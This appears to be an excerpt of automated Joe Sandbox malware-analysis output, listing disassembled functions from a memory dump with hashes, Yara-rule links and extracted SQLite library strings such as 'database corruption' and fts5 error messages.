Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID: rbu(%s)/%z$rbu/zipvfs setup error
API String ID: 0-199214844
Opcode ID: 8a0aa2e8c53ced69d8c4afa7c8272ea1178db75969312c9b7f4daa292339def2
Instruction ID: 3545ee58e9bf562a451a9fb85f83265e20ecc11a95d075e340430b03d2629ee9
Opcode Fuzzy Hash: 8a0aa2e8c53ced69d8c4afa7c8272ea1178db75969312c9b7f4daa292339def2
Instruction Fuzzy Hash: C721E1B66003069FD710CF19DC81AAAB7E5EBC8230F11447EE95D87211DB32E8048B93

Function 1D775280 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 81COMMON

Download Yara Rule

Strings

%s at line %d of [%.10s], xrefs: 1D775301
ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1D7752F2
database corruption, xrefs: 1D7752FC

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
API String ID: 0-2528248365
Opcode ID: 89a728de78c3a52381500393089531b703a6a5676c918e15ff7fbeeca46a3d04
Instruction ID: 8d1872bb1e6d1403d4949701442349daaafb33e3bc16f393d74d9fc688bcd519
Opcode Fuzzy Hash: 89a728de78c3a52381500393089531b703a6a5676c918e15ff7fbeeca46a3d04
Instruction Fuzzy Hash: D611D87760421077CB105B5DFC40CEBBB95DFC52B6F0A4566FA4C57122E623E91193A3

Function 1D898490 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 80COMMON

Download Yara Rule

Strings

%s at line %d of [%.10s], xrefs: 1D8984D0
ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1D8984C1
database corruption, xrefs: 1D8984CB

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
API String ID: 0-2528248365
Opcode ID: 7c66a17251de5190fddd99ddc03ecdd2d42bc93601e60ec9972035c6df92845e
Instruction ID: c122501cd48fbc2884e40d1326eaf6ad4dfa07a903d4563d81f46a6186260ab6
Opcode Fuzzy Hash: 7c66a17251de5190fddd99ddc03ecdd2d42bc93601e60ec9972035c6df92845e
Instruction Fuzzy Hash: 6521B076204B42DBD7208E58DC80BA7B3B4AFC4221F00482EF98A87352E335E9498763

Function 1D77FD60 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 77COMMON

Download Yara Rule

Strings

%s at line %d of [%.10s], xrefs: 1D77FE82
ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1D77FDE6, 1D77FE61
database corruption, xrefs: 1D77FE7D

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
API String ID: 0-2528248365
Opcode ID: 453e7ac76d33d28568255fc73bc47aa371d916039e5f5765117c5ff86502f4fe
Instruction ID: 7e7d713f17432a0df3aae8eada40bc1a05894fe722cdf72198211747f17ce722
Opcode Fuzzy Hash: 453e7ac76d33d28568255fc73bc47aa371d916039e5f5765117c5ff86502f4fe
Instruction Fuzzy Hash: EA3138A81542818AD7158F24C404366BBA1BF15318F64C8DED4498F797E37BC4C7DB97

Function 1D73B220 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 76COMMON

Download Yara Rule

Strings

misuse, xrefs: 1D73B233
%s at line %d of [%.10s], xrefs: 1D73B238
ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1D73B229

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
API String ID: 0-3564305576
Opcode ID: a5ac2b79d4a7b3dd04e17c7e2e1abda1d92e3262ed50b554ee8d46e8588cf04e
Instruction ID: 3828ace30907e3e2afa76cd3f2eb6d52a6035a24a5717c622d31a360c6007ad2
Opcode Fuzzy Hash: a5ac2b79d4a7b3dd04e17c7e2e1abda1d92e3262ed50b554ee8d46e8588cf04e
Instruction Fuzzy Hash: B911D875604701BBD701DA28DC84F7F77A9AFC4226F42452DF96997213E730E51487A3

Function 1D78D6F0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON

Download Yara Rule

Strings

%s%s, xrefs: 1D78D725

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID: %s%s
API String ID: 0-3252725368
Opcode ID: 75fcbeee3588f811bc7ae5dcfbee94016eee0781531ce3654c0718032ebb68a6
Instruction ID: 7b62d0545f238496acef2c1cce45fff5db06fbb9d8cf7c83dd7fb9b9c3c70dc8
Opcode Fuzzy Hash: 75fcbeee3588f811bc7ae5dcfbee94016eee0781531ce3654c0718032ebb68a6
Instruction Fuzzy Hash: 6A118475908220DFD7015B59DCC8B6633B9FF823AAF04026AF908D7216D7359515CBB3

Function 1D856140 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 69COMMON

Download Yara Rule

Strings

fts5: error creating shadow table %q_%s: %s, xrefs: 1D856197
WITHOUT ROWID, xrefs: 1D856150, 1D856162
CREATE TABLE %Q.'%q_%q'(%s)%s, xrefs: 1D856175

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID: WITHOUT ROWID$CREATE TABLE %Q.'%q_%q'(%s)%s$fts5: error creating shadow table %q_%s: %s
API String ID: 0-1971204597
Opcode ID: 00f89b1b2ee5c288f88df107030d6a092d94f62ff72a85c0eaf75f7358ce19c8
Instruction ID: adb34534612df9ff76bdb4d99ee7f7714bd5982b0f2e6c5a27a3d279e88bba13
Opcode Fuzzy Hash: 00f89b1b2ee5c288f88df107030d6a092d94f62ff72a85c0eaf75f7358ce19c8
Instruction Fuzzy Hash: 2E119071608210AFDB018F58ECC8B2AB7B8FB8529AF00466DF945DA212D735D414DFA3

Function 1D7DA6B0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 67COMMON

Download Yara Rule

Strings

%s at line %d of [%.10s], xrefs: 1D7DA6D2
ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1D7DA6C3
database corruption, xrefs: 1D7DA6CD

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
API String ID: 0-2528248365
Opcode ID: 2a7ce817cb18fafaf4bd53a1ba6964742a67b650906208ee2413951e6d8eef08
Instruction ID: 7794b7bb2ab3ad12039a689afe7f5fca6f89d30a22e08d381495fb10cbba024c
Opcode Fuzzy Hash: 2a7ce817cb18fafaf4bd53a1ba6964742a67b650906208ee2413951e6d8eef08
Instruction Fuzzy Hash: 731160B52042019FD700DF59EC80FAB77E9EFD0321F5508AAF6449B261D331A8458B63

Function 1D774DA0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 65COMMON

Download Yara Rule

Strings

%s at line %d of [%.10s], xrefs: 1D774E27
ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1D774E18
database corruption, xrefs: 1D774E22

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
API String ID: 0-2528248365
Opcode ID: 964b7b2479aab801dfdf06940e660c2da769371e543c49ad1c29b25f49296d1a
Instruction ID: 9321bde8595fdaf9cf1548a7e3e8b2e3e367118c7e25526071ead51fb6e5f5ad
Opcode Fuzzy Hash: 964b7b2479aab801dfdf06940e660c2da769371e543c49ad1c29b25f49296d1a
Instruction Fuzzy Hash: 91118172605211DFC700DF58D880A9ABBE5EF94769F15449EF1489B222D372E842CB92

Function 1D74F8A0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON

Download Yara Rule

Strings

integer overflow, xrefs: 1D74F8ED

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID: integer overflow
API String ID: 0-1678498654
Opcode ID: b291dfa1ebf5b148e2b626a6176fa1451b16ea2ea0579780dbfc7de78d063128
Instruction ID: 1ae5de83dbd4791b8b17ab0e77a38df9ceb1cd5489f5ed4b0938f6f046ef6304
Opcode Fuzzy Hash: b291dfa1ebf5b148e2b626a6176fa1451b16ea2ea0579780dbfc7de78d063128
Instruction Fuzzy Hash: 7A11D376C08611AADB02AE24BC08B9AB7A55F12330F26878AE5555A1B2E77095D4C3D3

Function 1D742380 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 62COMMON

Download Yara Rule

Strings

misuse, xrefs: 1D742406
%s at line %d of [%.10s], xrefs: 1D74240B
ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1D7423FC

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
API String ID: 0-3564305576
Opcode ID: 44a6bf8a68a7ebbe23ca6b776678810504c29090fdc8a9786796c86883bb2699
Instruction ID: 1df85cd2a4f6444f42dd94bd15a7ee32ab25669711878d48aa2a98c4300c6c3f
Opcode Fuzzy Hash: 44a6bf8a68a7ebbe23ca6b776678810504c29090fdc8a9786796c86883bb2699
Instruction Fuzzy Hash: 0011AC74204202EFD709CE0CDCD0E6AB7A4BF88714F1280ADE6458F252D731E896DB92

Function 1D7E1F70 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58COMMON

Download Yara Rule

Strings

JSON path error near '%q', xrefs: 1D7E1F92

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID: JSON path error near '%q'
API String ID: 0-481711382
Opcode ID: 0b5857cfd51a094f773d3b0407596a1b34c15e924b997cfdd8303d410f9d9ab0
Instruction ID: 1f603880c83242e8ba3347c6430cbf79fc78e16533e9398e7a60fe925b68168c
Opcode Fuzzy Hash: 0b5857cfd51a094f773d3b0407596a1b34c15e924b997cfdd8303d410f9d9ab0
Instruction Fuzzy Hash: BE01E1B260D211BEDB249A54AC01BABBBD4DB41271F21062DF999972E1DB71A81183E3

Function 1D741DF0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 56COMMON

Download Yara Rule

Strings

misuse, xrefs: 1D741E59
%s at line %d of [%.10s], xrefs: 1D741E63
ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1D741E53

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
API String ID: 0-3564305576
Opcode ID: 8d12f7cb2d3c86683509d90c2c94c188f859b03017f74ec55437ef8e4a92b480
Instruction ID: 31a8538e1421e634d8afdd6000418dcf95ca57235e9fc1cc5c4fefc853df4a7b
Opcode Fuzzy Hash: 8d12f7cb2d3c86683509d90c2c94c188f859b03017f74ec55437ef8e4a92b480
Instruction Fuzzy Hash: 6911C438308560DBD306EE28E844B57BB78BF46626F15829EE955CB322D330E505C7A3

Function 1D75F0E0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56COMMON

Download Yara Rule

Strings

INSERT INTO %Q.%Q(%Q) VALUES('flush'), xrefs: 1D75F105

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID: INSERT INTO %Q.%Q(%Q) VALUES('flush')
API String ID: 0-2312637080
Opcode ID: 73aa1f02af5a0ad3241f8723b1fad85bafe3b37aadbe253f32814e3828b4aa52
Instruction ID: 8a750ec9aae84745a0425144e6ef92a1ab8ab4cd724d6f99e6bba2a0a4057ecc
Opcode Fuzzy Hash: 73aa1f02af5a0ad3241f8723b1fad85bafe3b37aadbe253f32814e3828b4aa52
Instruction Fuzzy Hash: 3D01B5377082416ED321966EFC44FA7F7E8EBC4231F05046EF5ADC3211D361A8858362

Function 1D760D70 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47COMMON

Download Yara Rule

Strings

INSERT INTO %Q.%Q(%Q) VALUES('flush'), xrefs: 1D760D87

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID: INSERT INTO %Q.%Q(%Q) VALUES('flush')
API String ID: 0-2312637080
Opcode ID: 17d4b881cd4b23427a867eb69d1372982fe730547eb5eb4cc2b6ec9f5c1ed7fa
